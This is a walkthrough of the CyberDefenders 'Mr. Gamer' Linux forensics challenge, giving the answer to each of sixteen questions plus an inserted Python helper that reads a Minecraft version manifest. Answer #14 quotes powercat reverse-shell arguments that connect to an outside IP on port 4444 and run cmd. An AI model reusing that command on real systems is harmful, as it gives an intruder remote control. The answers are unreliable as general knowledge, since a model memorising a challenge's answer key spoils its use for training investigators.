Mr. Gamer Write Up (Cyberdefenders.org)

Orhan Öztaş
3 min read · Aug 8, 2022

We are solving the Mr. Gamer room today. This room includes Linux forensics and a little bit of gaming. Let's dive into the Mr. Gamer room. I used the Autopsy tool for this investigation.

#1 I use print statements for my logging ->
What is the name of the utility/library the user was looking at exploits for?

Answer

log4j

#2 Mischievous Lemur ->
What is the version ID number of the operating system on the machine?

Answer

21.10

#3 $whoami ->
What is the hostname of the computer?

Answer

rshell-lenovo

#4 A little blue birdie told me ->
What is one anime that the user likes?

Answer

attack on titan

#5 Into the Matrix, we go ->
What is the UUID for the attacker’s Minecraft account?

Answer

8b0dec19-b463-477e-9548-eef20c861492

#6 Today’s Youtube video is sponsored by… ->
What VPN client did the user install and use on the machine?

Answer

zerotier-vpn

#7 Be our guest ->
What was the user’s first password for the guest wifi?

Answer

093483

#8 If a picture is worth a thousand words, how many is a video worth? ->
The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?

Answer

265342

#9 I’m hungry for videos ->
What is the new channel name for the YouTuber whose cookbook is shown on the device?

Answer

Babish Culinary Universe

#10 Hunt the Wumpus ->
What is the module with the highest installed version for the chat application with the mascot Wumpus?

Answer

discord_voice

#11 It’s raining ocelots and wolves ->
According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?

Answer

45F

#12 Never gonna give… up on this question ->
What is the upload date of the second YouTube video on the channel from which the user downloaded a YouTube video?

If we go to the YouTube channel for Rick, the second video was uploaded on 10/25/2009.

Answer

10/25/2009

#13 Buzzy Bees ->
What is the SHA-1 hash of Minecraft’s “latest” release according to the system?

You can find a version file at the path:

home\rafael\.minecraft\versions\version_manifest_v2.json
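
The lookup in that file takes two steps: read the version id under `latest`, then find the entry with that id in `versions` and take its `sha1`. The following is an added example, not part of the original write-up; the function name is hypothetical and the sample manifest is constructed with placeholder ids, URLs and hashes.

```python
import json
import re

# Constructed sample in the layout of version_manifest_v2.json.
# Ids, URLs and hashes are placeholders, not values from the evidence image.
SAMPLE_MANIFEST = json.dumps({
    "latest": {"release": "9.9.1", "snapshot": "99w01a"},
    "versions": [
        {"id": "99w01a", "type": "snapshot",
         "url": "https://example.invalid/99w01a.json", "sha1": "b" * 40},
        {"id": "9.9.1", "type": "release",
         "url": "https://example.invalid/9.9.1.json", "sha1": "A" * 40},
        {"id": "9.9.0", "type": "release",
         "url": "https://example.invalid/9.9.0.json", "sha1": "c" * 40},
    ],
})

SHA1_RE = re.compile(r"[0-9a-f]{40}")


def latest_sha1(manifest_text, channel="release"):
    """Return (version id, sha1) for the manifest's latest release or snapshot."""
    manifest = json.loads(manifest_text)
    try:
        wanted = manifest["latest"][channel]
    except KeyError:
        raise ValueError(f"manifest has no latest.{channel} entry")

    # The hash is not stored under "latest"; it sits on the matching
    # entry of the "versions" array, so join on the id.
    matches = [v for v in manifest.get("versions", []) if v.get("id") == wanted]
    if len(matches) != 1:
        raise LookupError(f"expected one entry for {wanted!r}, found {len(matches)}")

    sha1 = str(matches[0].get("sha1", "")).lower()
    if not SHA1_RE.fullmatch(sha1):
        raise ValueError(f"entry {wanted!r} has no valid SHA-1")
    return wanted, sha1


if __name__ == "__main__":
    # With an exported copy of the file, pass open(path).read() instead.
    version_id, digest = latest_sha1(SAMPLE_MANIFEST)
    print(f"latest release {version_id}: {digest}")
```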

Answer

3c6e119c0ff307accf31b596f9cd47ffa2ec6305

#14 The RCE is base(64)d on what? ->
What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was “powercat -D Y -l a -n,” the answer would be “-D Y -l a -n”)

Use the bash history:

home\rafael\.bash_history

Answer

-c 192.168.191.253 -p 4444 -e cmd

#15 Hello (New) World ->
How many dimensions (including the overworld) did the player travel to in the “oldest of the worlds”?

Answer

one

#16 Matrix_1999 is the key! ->
What is the mojangClientToken stored in the Keystore?

Answer

2f76c8b04c004ddd888a05a6cad6be52
